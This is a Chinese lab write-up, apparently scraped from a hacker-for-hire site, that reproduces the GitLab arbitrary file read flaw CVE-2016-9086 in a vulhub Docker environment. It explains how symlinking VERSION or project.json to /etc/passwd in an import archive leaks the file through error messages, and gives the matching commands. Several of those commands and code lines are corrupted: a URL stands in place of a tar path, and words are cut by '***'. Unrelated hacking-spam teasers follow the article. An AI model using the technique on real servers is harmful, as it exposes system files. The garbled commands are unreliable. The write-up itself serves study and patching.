Gitlab 任意文件读取漏洞复现

访客4年前关于黑客接单905

Gitlab 任意文件读取漏洞(CVE-2016-9086)

GitLab 是一个利用 Ruby on Rails 开发的开源应用程序,实现一个自托管的 Git 项目仓库,可通过 Web 界面进行访问公开的或者私人项目。近日研究者发现在其多个版本中存在文件读取漏洞 (CVE-2016-9086) 和 任意用户 authentication_token 泄漏漏洞,攻击者可以通过这两个漏洞来获取管理员的权限,进而控制所有 gitlab 项目。

影响版本:

  • 任意文件读取漏洞 (CVE-2016-9086):GitLab CE/EEversions 8.9, 8.10, 8.11, 8.12, and 8.13

  • 任意用户 authentication_token 泄露漏洞:Gitlab CE/EE versions 8.10.3-8.10.5

漏洞分析

本文在前辈研究基础上只分析任意斍读取漏洞。

从 8.9.0 版本开始,GitLab 新增了导入导出项目的功能。一个空的 gitlab 项目导出后结构如下:

VERSION ? ? ? ?  # GitLab 的导出模块的版本
project.json ? ? # 包含了项目的配置文件

当我们导入 GitLab 的导出文件的时候,GitLab 会按照如下步骤处理:

  1. 服务器根据 VERSION 文件内容检测导出文件版本,如果版本符合,则导入。

  2. 服务器根据 Project.json 文件创建一个新的项目,并将对应的项目文件拷贝到服务器上对应的位置。

检测 VERSION 文件的代码位于:中:

...
def check!
  version=File.open(version_file, &:readline)
  verify_version!(version)
rescue=> e
  shared.error(e)
  false
end
...
def verify_version!(version)
    if Gem::Version.new(version) !=Gem::Version.new(Gitlab::ImportExport.version)
        raise Gitlab::ImportExport::Error.new("Import version mi *** atch: Required #{Gitlab::ImportExport.version} but was #{version}")
    else
        true
    end
end
...

我们可以看到这里的逻辑是读取 VERSION 文件的之一行赋值给变量 version,然后检测 verison 与当前版本是否相同,相同返回 true,不相同则返回错误信息 (错误信息中包括变量 version 的值). 于是漏洞发现者 Jobert Abma 巧妙的使用了软链接来达到读取任意文件的目的。首先,我们给 VERSION 文件加上软链接并重新打包。

ln -sf /etc/passwd VERSION
tar zcf change_version.tar.gz https://www.freebuf.com/articles/web/

这样,读取 VERSION 文件的时候服务器就会根据软链接读取到 /etc/passwd 的之一行内容并赋值给 version。但是由于 version 与当前版本不相同,所以会输出 version 的值,也就是 /etc/passwd 之一行的内容。

但是,如果只读取任意文件的之一行,能做的事情还是太少了。漏洞发现者显然不满足这一结果,他继续找了下去.读取 Project.json 这一配置文件的代码位于:/lib/gitlab/import_export/project_tree_restorer.rb 中:

...
def restore
  json=IO.read(@path)
  tree_hash=ActiveSupport:: *** ON.decode(json)
  project_members=tree_hash.delete('project_members')

  ActiveRecord::Base.no_touching do
    create_relations
  end
rescue=> e
  shared.error(e)
  false
end
...

在这里,我们可以再次使用软链接使变量 json 获取到任意文件的内容,但是由于获取的文件不是 json 格式,无法 decode,导致异常抛出,最终在前端显示出任意文件的内容。 添加软链接并打包:

ln -sf /etc/passwd project.json
tar zcf change_version.tar.gz https://www.freebuf.com/articles/web/

测试环境

如下测试环境借助 vulhub 的 docker 镜像,附上 P 师傅的链接:https://github.com/vulhub/vulhub

编译及运行环境:

docker-compose up -d

请使用 2G 及以上内存的 VPS 或虚拟机运行该环境,实测 1G 内存的机器无法正常运行 Gitlab(运行后 502 错误)。

漏洞复现

环境运行后,Web 端口为 10080,ssh 端口为 10022。访问 ,设置管理员(用户名 )密码,登录。

1608812492_5fe487cc677f967d7938c.png!small?1608812491766

新建一个项目,点击 :

1608812524_5fe487ec43f38790d2ccd.png!small?1608812523626

将 test.tar.gz上传,将会读取到 文件内容:

1608812536_5fe487f888df227842bb2.png!small?1608812536451

1608812564_5fe48814752eac2f5e79c.png!small?1608812563768

1608812589_5fe4882dbc0c2c98c1723.png!small?1608812590001

漏洞修复

官方先移除了导入包里的软连接,其次,读取 VERSION 的内容和 project.json 的内容出错后将内容输出到日志里而非返回到前端。

1608813123_5fe48a43f25dfb2d2be4a.png!small?1608813123255

1608813158_5fe48a660348b4c232379.png!small?1608813157294

1608813187_5fe48a838168708987063.png!small?1608813186728

参考资料

  1. https://github.com/gitlabhq/gitlabhq/commit/912e1ff4284eb39fe020b8e823085a2cb7f244fb

  2. http://paper.seebug.org/104/

  3. https://vulhub.org/#/environments/gitlab/CVE-2016-9086/


相关文章

什么叫体积?体积公式及测量

什么叫体积?体积公式及测量

我们讲解了一些特殊测量方法。本文我们来讲一讲体积的特殊测量方法。这里所说的特殊方法主要是针对形状不规则的物体的体积进行测量,所要用到的器材就是量筒和量杯。   我们先来回顾一下形状规则的物体体...

被称为世界上最无所畏惧的动物 人称平头哥的是?蚂蚁庄园今日答案

被称为世界上最无所畏惧的动物 人称平头哥的是?蚂蚁庄园今日答案

被称为世界上最无所畏惧的动物,人称平头哥的是?这是蚂蚁庄园4月27号今日庄园小课堂的问题,很多用户还不知道答案,本文小编会为大家详细介绍,感兴趣的小伙伴们,一起和小编来看看吧! 蚂蚁庄园回答知识...

黑客补漏洞比找漏洞困难-黑客jack死亡之谜(世界上最牛黑客死亡之谜)

黑客补漏洞比找漏洞困难-黑客jack死亡之谜(世界上最牛黑客死亡之谜)

黑客补漏洞比找漏洞困难相关问题 拼多多黑客软件怎么买相关问题 黑客WLAN如何破解密码 2020强制加QQ好友(qq强制加好友)...

黑客入门图,极棒黑客大赛 网络攻防,境外黑客扬言攻击网站清单

mkdir homecp srvr.js ./home第一季度中,全球邮件进犯测验计算显现,占比最高的是“发送机以恣意不存在的域名测验对邮件主机发送邮件”;其次是“企图耗费邮件主机运算资源的无用联机”...

助学金申请书怎么写(高中助学金申请书怎么写)

  范例一   尊重的院校的领导干部: 你好!   我是来源于XX初中XX班的XX,性別:男,现就读于XX初中,初中升高中不计入体育文化分成XX分,因家中经济发展艰难,特申请办理本次的重点国家助学金补...

苹果手机黑客技术(苹果手机 黑客)

苹果手机黑客技术(苹果手机 黑客)

本文目录一览: 1、苹果手机点了恶意链接被黑客攻击恢复出厂设置可以吗 2、iPhone硬件漏洞可永久越狱,为何称为近年来iPhone黑客界最大的进展之一? 3、黑客利用14种不同的漏洞从iPh...